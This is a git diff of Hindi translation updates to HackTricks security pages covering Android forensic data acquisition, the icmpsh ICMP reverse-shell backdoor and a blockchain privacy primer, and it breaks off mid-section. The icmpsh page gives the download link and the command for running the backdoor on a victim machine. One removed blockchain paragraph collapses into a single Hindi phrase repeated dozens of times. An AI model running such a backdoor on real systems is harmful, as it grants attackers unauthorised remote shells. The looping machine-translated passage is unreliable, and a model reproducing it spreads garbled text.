+{% endhint %} diff --git a/android-forensics.md b/android-forensics.md index 6385ac1ab..bed8b153e 100644 --- a/android-forensics.md +++ b/android-forensics.md @@ -1,51 +1,53 @@ -# Android Forensics +# एंड्रॉइड फोरेंसिक्स + +{% hint style="success" %} +**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -## Locked Device +## लॉक किया गया डिवाइस -एक Android डिवाइस से डेटा निकालना शुरू करने के लिए उसे अनलॉक होना चाहिए। अगर यह लॉक है तो आप: +एक एंड्रॉइड डिवाइस से डेटा निकालने के लिए इसे अनलॉक किया जाना चाहिए। अगर यह लॉक है तो आप कर सकते हैं: -* जांचें कि क्या डिवाइस में USB के माध्यम से डिबगिंग सक्रिय है। -* संभावित [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf) के लिए जांचें। -* [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) के साथ प्रयास करें। +* जांचें कि डिवाइस में USB के माध्यम से डीबगिंग सक्षम है। +* [स्मज अटैक](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) के लिए जांच करें +* [ब्रूट-फोर्स](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) के साथ प्रयास करें -## Data Adquisition +## डेटा अधिग्रहण -[android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) बनाएं और इसे [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) का उपयोग करके निकालें: `java -jar abe.jar unpack file.backup file.tar` +[adb का उपयोग करके एंड्रॉइड बैकअप बनाएं](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) और इसे [एंड्रॉइड बैकअप एक्सट्रैक्टर](https://sourceforge.net/projects/adbextractor/) का उपयोग करके निकालें: `java -jar abe.jar unpack file.backup file.tar` -### If root access or physical connection to JTAG interface +### यदि रूट एक्सेस या JTAG इंटरफेस के लिए फिजिकल कनेक्शन है -* `cat /proc/partitions` (फ्लैश मेमोरी के पथ की खोज करें, आमतौर पर पहली प्रविष्टि _mmcblk0_ होती है और यह पूरी फ्लैश मेमोरी के लिए होती है)। -* `df /data` (सिस्टम के ब्लॉक साइज का पता लगाएं)। -* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (ब्लॉक साइज से एकत्रित जानकारी के साथ इसे निष्पादित करें)। +* `cat /proc/partitions` (फ्लैश मेमोरी का पथ खोजें, सामान्य रूप से पहला एंट्री _mmcblk0_ होती है और पूरी फ्लैश मेमोरी के लिए होती है)। +* `df /data` (सिस्टम का ब्लॉक साइज़ खोजें)। +* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (इसे ब्लॉक साइज़ से जुटे जानकारी के साथ चलाएं)। -### Memory +### मेमोरी -Linux Memory Extractor (LiME) का उपयोग करके RAM जानकारी निकालें। यह एक कर्नेल एक्सटेंशन है जिसे adb के माध्यम से लोड किया जाना चाहिए। +लिनक्स मेमोरी एक्सट्रैक्टर (LiME) का उपयोग करें रैम जानकारी निकालने के लिए। यह एक कर्नेल एक्सटेंशन है जो adb के माध्यम से लोड किया जाना चाहिए। + +{% hint style="success" %} +**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md index 85e6228fa..9369a2873 100644 --- a/backdoors/icmpsh.md +++ b/backdoors/icmpsh.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +जीसीपी हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %} बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -29,22 +30,23 @@ IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') echo Please insert the IP where you want to listen read IP ``` -# **शिकारक दल** +# **शिकारी पक्ष** -**icmpsh.exe** को शिकारक के पास अपलोड करें और क्रियान्वित करें: +शिकारी पक्ष पर **icmpsh.exe** अपलोड करें और क्रियान्वित करें: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com) -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %} diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index 7298e0d99..85538cc60 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,150 +1,144 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापन दिखाए जाए** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, **The PEASS Family** की खोज करें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} -# मूलभूत शब्दावली +## मूल अवधारणाएँ -* **स्मार्ट कॉन्ट्रैक्ट**: स्मार्ट कॉन्ट्रैक्ट्स बेसिकली **ब्लॉकचेन पर स्टोर किए गए प्रोग्राम हैं जो निश्चित स्थितियों को पूरा होने पर चलते हैं**। वे सामान्यत: **एक समझौते** के **क्रियान्वयन** को स्वचालित करने के लिए उपयोग किए जाते हैं ताकि सभी सहभागियों को परिणाम के बारे में तुरंत पता चल सके, किसी मध्यस्थ की सहायता या समय की हानि के बिना। (से [यहाँ](https://www.ibm.com/topics/smart-contracts)). -* मूल रूप से, एक स्मार्ट कॉन्ट्रैक्ट एक **कोड का टुकड़ा** है जो लोग जब उन्हें अनुबंध तक पहुंचते हैं तो क्रियान्वित होगा। स्मार्ट कॉन्ट्रैक्ट्स **ब्लॉकचेन में चलते हैं** (इसलिए परिणाम स्थायी रूप से स्टोर होते हैं) और लोग उन्हें स्वीकार करने से पहले पढ़ सकते हैं। -* **डीएपी**: **डेसेंट्रलाइज्ड एप्लिकेशन** स्मार्ट कॉन्ट्रैक्ट्स के ऊपर लागू होते हैं। उनके पास एक फ्रंट-एंड होता है जहां उपयोगकर्ता एप्लिकेशन के साथ बातचीत कर सकते हैं, **बैक-एंड** सार्वजनिक होता है (ताकि इसे मूल्यांकन किया जा सके) और एक **स्मार्ट कॉन्ट्रैक्ट** के रूप में लागू किया जाता है। कभी-कभी डेटाबेस का उपयोग आवश्यक होता है, एथेरियम ब्लॉकचेन हर खाते को निश्चित संग्रह आवंटित करता है। -* **टोकन और सिक्के**: एक **सिक्का** एक क्रिप्टोकरेंसी है जो **डिजिटल** **पैसे** के रूप में काम करता है और एक **टोकन** कुछ **मूल्य** का प्रतिनिधित्व करता है लेकिन यह एक सिक्का नहीं है। -* **यूटिलिटी टोकन्स**: ये टोकन उपयोगकर्ता को **बाद में कुछ सेवा तक पहुंचने** की अनुमति देते हैं (यह किसी विशिष्ट वातावरण में कुछ मूल्य वाली चीज है)। -* **सुरक्षा टोकन्स**: ये **स्वामित्व** या किसी संपत्ति का प्रतिनिधित्व करते हैं। -* **डीफाई**: **डेसेंट्रलाइज्ड फाइनेंस**। -* **डीईएक्स: डेसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म्स**। -* **डीएओएस**: **डेसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स**। +- **स्मार्ट कॉन्ट्रैक्ट्स** को उन कार्यक्रमों के रूप में परिभाषित किया जाता है जो ब्लॉकचेन पर कार्रवाई करते हैं जब कुछ शर्तें पूरी होती हैं, बिचौलियों के बिना समझौते की कार्रवाई को स्वचालित करना। +- **डीसेंट्रलाइज्ड एप्लिकेशन्स (dApps)** स्मार्ट कॉन्ट्रैक्ट्स पर आधारित होते हैं, जिनमें एक उपयोगकर्ता-मित्रपूर्ण फ्रंट-एंड और एक पारदर्शी, जांचने योग्य बैक-एंड होता है। +- **टोकन और सिक्के** विभाजित करते हैं जहां सिक्के डिजिटल धन के रूप में काम करते हैं, जबकि टोकन विशेष संदर्भों में मूल्य या स्वामित्व को दर्शाते हैं। +- **यूटिलिटी टोकन्स** सेवाओं तक पहुंचने की अनुमति देते हैं, और **सिक्योरिटी टोकन्स** संपत्ति के स्वामित्व को दर्शाते हैं। +- **डीफाई** का मतलब है डीसेंट्रलाइज्ड फाइनेंस, जो केंद्रीय प्राधिकरणों के बिना वित्तीय सेवाएं प्रदान करता है। +- **डीएक्स** और **डीएओएस** डीसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म और डीसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स को संदर्भित करते हैं। -# सहमति तंत्र +## सहमति तंत्र -एक ब्लॉकचेन लेनदारी को मान्य करने के लिए, इसे **ब्लॉकचेन** में **जोड़ना** होगा। मान्यकर्ता (खान संचालक) इस जोड़ने का कार्य करते हैं; अधिकांश प्रोटोकॉल में, वे इसे करने के लिए **पुरस्कार प्राप्त** करते हैं। ब्लॉकचेन को सुरक्षित रखने के लिए, इसे **एक दुर्भाग्यपूर्ण उपयोगकर्ता या समूह से बड़ी संख्या में मान्यता प्राप्त करने से रोकने का एक तंत्र होना चाहिए**। +सहमति तंत्र सुनिश्चित करते हैं और ब्लॉकचेन पर सुरक्षित और स्वीकृत लेन-देन की पुष्टि करते हैं: +- **प्रूफ ऑफ वर्क (PoW)** लेन-देन सत्यापन के लिए कंप्यूटेशनल पावर पर निर्भर होता है। +- **प्रूफ ऑफ स्टेक (PoS)** वैधकों से निश्चित मात्रा में टोकन रखने की मांग करता है, जो PoW की तुलना में ऊर्जा खपत को कम करता है। -प्रूफ ऑफ वर्क, एक और सामान्यत: उपयोग किया जाने वाला सहमति तंत्र, सौजन्य की मान्यता की जांच के लिए गणना क्षमता की मान्यता का उपयोग करता है, जिसमें एक संभावित हमलावर को वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वै -``` +## बिटकॉइन महत्वपूर्ण अंश + +### लेन-देन + +बिटकॉइन लेन-देन में फंड ट्रांसफर शामिल होते हैं। लेन-देन डिजिटल हस्ताक्षरों के माध्यम से सत्यापित होते हैं, सुनिश्चित करते हैं कि केवल निजी कुंजी के मालिक ही स्थानांतरण प्रारंभ कर सकता है। + +#### मुख्य घटक: + +- **मल्टीसाइनेचर लेन-देन** को एक लेन-देन को अधिक संकेतों की आवश्यकता होती है अनुमति देने के लिए। +- लेन-देन में **इनपुट्स** (फंड का स्रोत), **आउटपुट्स** (गंतव्य), **शुल्क** (खनिजों को दिया जाता है), और **स्क्रिप्ट्स** (लेन-देन नियम) शामिल होते हैं। + +### लाइटनिंग नेटवर्क + +बिटकॉइन की स्कैलेबिलिटी को बढ़ाने का उद्देश्य एक चैनल के भीतर कई लेन-देनों की अनुमति देना है, केवल अंतिम स्थिति को ब्लॉकचेन पर प्रसारित करना। + +## बिटकॉइन गोपनीयता चिंताएँ + +गोपनीयता हमले, जैसे कि **सामान्य इनपुट स्वामित्व** और **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**, लेन-देन पैटर्न का शोषण करते हैं। **मिक्सर्स** और **कॉइनजॉइन** जैसी रणनीतियाँ उपयोगकर्ताओं के बीच लेन-देन लिंक को अस्पष्ट करके गोपनीयता को बेहतर बनाती हैं। + +## बिटकॉइन गोपनीयता हमले + +# बिटकॉइन गोपनीयता हमलों का सारांश + +बिटकॉइन के विश्व में, लेन-देनों की गोपनीयता और उपयोगकर्ताओं की गुमनामी अक्सर चिंता के विषय होते हैं। यहाँ कुछ सामान्य विधियाँ हैं जिनके माध्यम से हमलावर बिटकॉइन गोपनीयता को कमजोर कर सकते हैं। + +## **सामान्य इनपुट स्वामित्व मान्यता** + +सामान्य रूप से विभिन्न उपयोगकर्ताओं से आयात एक ही लेन-देन में मिलाया जाना अत्यधिक असाधारण होता है क्योंकि इसमें जटिलता शामिल होती है। इसलिए, **एक ही लेन-देन में दो इनपुट पते अक्सर एक ही मालिक के होने का अनुमान किया जाता है**। + +## **यूटीएक्सओ चेंज एड्रेस डिटेक्शन** + +एक यूटीएक्सओ, या **अनखर्चित लेन-देन आउटपुट**, को एक लेन-देन में पूरी तरह से खर्च किया जाना चाहिए। अगर इसमें से केवल एक हिस्सा किसी अन्य पते पर भेजा जाता है, तो शेष नये चेंज एड्रेस पर जाता है। दर्शक इस नए पते को भेजने वाले का मानते हैं, जिससे गोपनीयता को खतरे में डाला जा सकता है। + +### उदाहरण +```bash 2 btc --> 4 btc 3 btc 1 btc ``` -मानते हैं कि उत्पादों में से एक चेंज है और दूसरा उत्पाद भुगतान है। दो व्याख्यान हैं: भुगतान उत्पाद या 4 BTC उत्पाद है या 1 BTC उत्पाद है। लेकिन अगर 1 BTC उत्पाद भुगतान राशि है तो 3 BTC इनपुट अनावश्यक है, क्योंकि वॉलेट केवल 2 BTC इनपुट खर्च कर सकती थी और इसे करने के लिए कम माइनर शुल्क भुगत सकती थी। यह एक संकेत है कि वास्तविक भुगतान उत्पाद 4 BTC है और 1 BTC चेंज उत्पाद है। +## **बाध्य पता पुनः उपयोग** -यह वह समस्या है जिसके लिए लेनदार अधिक से अधिक इनपुट होते हैं। इस लीक को ठीक करने का एक तरीका यह है कि चेंज उत्पाद किसी भी इनपुट से अधिक होने तक अधिक इनपुट जोड़ें, उदाहरण के लिए: -``` -2 btc --> 4 btc -3 btc 6 btc -5 btc -``` -## मजबूर पता पुनरउपयोग +हमलावार छोटी मात्रा में पहले से उपयोग किए गए पतों पर धन भेज सकते हैं, आशा है कि प्राप्तकर्ता भविष्य की लेन-देन में इन्हें अन्य इनपुट के साथ मिला दें, जिससे पते को एक साथ जोड़ा जा सके। -**मजबूर पता पुनरउपयोग** या **प्रोत्साहित पता पुनरउपयोग** एक प्रकार की है जब एक प्रतिकूल व्यक्ति ब्लॉक श्रृंखला पर पहले से ही उपयोग किए गए पतों को बिटकॉइन की एक (अक्सर छोटी) राशि देता है। दुश्मन उम्मीद करता है कि उपयोगकर्ता या उनका वॉलेट सॉफ्टवेयर **भुगतान को एक बड़े लेन-देन के लिए इनपुट के रूप में उपयोग करेगा जिससे सामान्य-इनपुट-स्वामित्व** नियमानुसार अन्य पतों को प्रकट करेगा। ये भुगतान अप्रत्याशित पता पुनरउपयोग में पता मालिक को मनोबलित पता पुनरउपयोग के रूप में समझा जा सकता है। +### सही वॉलेट व्यवहार +इस गोपनीयता लीक को रोकने के लिए वॉलेट को खाली पतों पर प्राप्त किए गए सिक्कों का उपयोग न करना चाहिए। -यह हमला कभी-कभी गलती से **धूल अटैक** कहलाता है। +## **अन्य ब्लॉकचेन विश्लेषण तकनीकें** -वॉलेट्स द्वारा सही व्यवहार यह है कि खाली पतों पर जमी मुद्रा को खर्च न करें। +- **सटीक भुगतान राशियाँ:** बिना परिवर्तन के लेन-देन एक उपयोगकर्ता द्वारा स्वामित्व में होने की संभावना है। +- **गोल नंबर:** एक लेन-देन में गोल नंबर एक भुगतान का सुझाव देता है, जिसमें गोल आउटपुट संभावित रूप से परिवर्तन होता है। +- **वॉलेट फिंगरप्रिंटिंग:** विभिन्न वॉलेट्स के अद्वितीय लेन-देन निर्माण पैटर्न होते हैं, जिससे विश्लेषक सॉफ़्टवेयर का पता लगा सकते हैं और संभावित रूप से परिवर्तन पता लगा सकते हैं। +- **राशि और समय संबंध:** लेन-देन के समय या राशि का खुलासा करना लेन-देन को ट्रेसेबल बना सकता है। -## अन्य ब्लॉकचेन विश्लेषण +## **ट्रैफिक विश्लेषण** -* **सटीक भुगतान राशियाँ**: परिवर्तन के साथ लेन-देन से बचने के लिए, भुगतान को UTXO के बराबर होना चाहिए (जो अत्यधिक अपेक्षित है)। इसलिए, एक **भुगतान जिसमें कोई परिवर्तन पता नहीं है, संभावित रूप से एक ही उपयोगकर्ता के 2 पतों के बीच स्थानांतरण है**। -* **गोल नंबर**: एक लेन-देन में, यदि आउटपुट में से एक "**गोल नंबर**" है, तो यह उचित है कि यह एक **इंसान को भुगतान करने के लिए जो उसने वह** "गोल नंबर" **मूल्य** डाला है, इसलिए अन्य हिस्सा बचा होना चाहिए। -* **वॉलेट फिंगरप्रिंटिंग:** एक सावधान विश्लेषक कभी-कभी यह निर्धारित कर सकता है कि कौन सा सॉफ्टवेयर किस लेन-देन को बनाया, क्योंकि **कई विभिन्न वॉलेट सॉफ्टवेयर हमेशा बिल्कुल एक ही तरीके से लेन-देन नहीं करते**। वॉलेट फिंगरप्रिंटिंग का उपयोग परिवर्तन आउटपुट का पता लगाने के लिए किया जा सकता है क्योंकि एक परिवर्तन आउटपुट वह है जिसे एक ही वॉलेट फिंगरप्रिंट के साथ खर्च किया गया है। -* **राशि और समय संबंध**: यदि व्यक्ति जिसने लेन-देन किया है **समय** और/या **राशि** का खुलासा करता है, तो इसे आसानी से **खोजा जा सकता है**। +नेटवर्क ट्रैफिक का मॉनिटरिंग करके हमलावर लेन-देन या ब्लॉक को आईपी पतों से जोड़ सकते हैं, उपयोगकर्ता गोपनीयता को कमजोर करते हैं। यह विशेष रूप से सत्य है अगर कोई संस्था बहुत सारे बिटकॉइन नोड चलाती है, जिससे उनकी लेन-देनों को मॉनिटर करने की क्षमता बढ़ जाती है। -## ट्रैफिक विश्लेषण - -कुछ संगठन **आपके ट्रैफिक को स्निफ करते** हुए आपको बिटकॉइन नेटवर्क में संचार करते हुए देख सकते हैं।\ -यदि प्रतिकूल एक लेन-देन या ब्लॉक देखता है **जो आपके नोड से निकल रहा है जिससे पहले नहीं आया था**, तो यह निश्चितता के साथ जान सकता है कि **लेन-देन आपके द्वारा किया गया था या ब्लॉक आपके द्वारा खनित हुआ था**। इंटरनेट कनेक्शन शामिल होने के कारण, प्रतिकूल व्यक्ति को खोजने में सक्षम होगा कि खोजे गए बिटकॉइन सूचना के साथ IP पता को जोड़ सकता है। - -एक हमलावर जो सभी इंटरनेट ट्रैफिक को स्निफ नहीं कर सकता है लेकिन जिसके पास **बहुत सारे बिटकॉइन नोड** होते हैं ताकि वह **स्रोतों के करीब रह सके**, वह जान सकता है कि कौन से IP पते लेन-देन या ब्लॉक की घोषणा कर रहे हैं।\ -इसके अलावा, कुछ वॉलेट समय-समय पर अपुष्ट लेन-देन को फिर से प्रसारित करते हैं ताकि वे नेटवर्क में व्यापक रूप से प्रसारित होने और खनित होने की अधिक संभावना हो। - -## पतों के मालिक के बारे में जानकारी प्राप्त करने के लिए अन्य हमले - -अधिक हमलों के लिए पढ़ें [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) - -# अनाम बिटकॉइन - -## बिटकॉइन गुमनामता से प्राप्त करना - 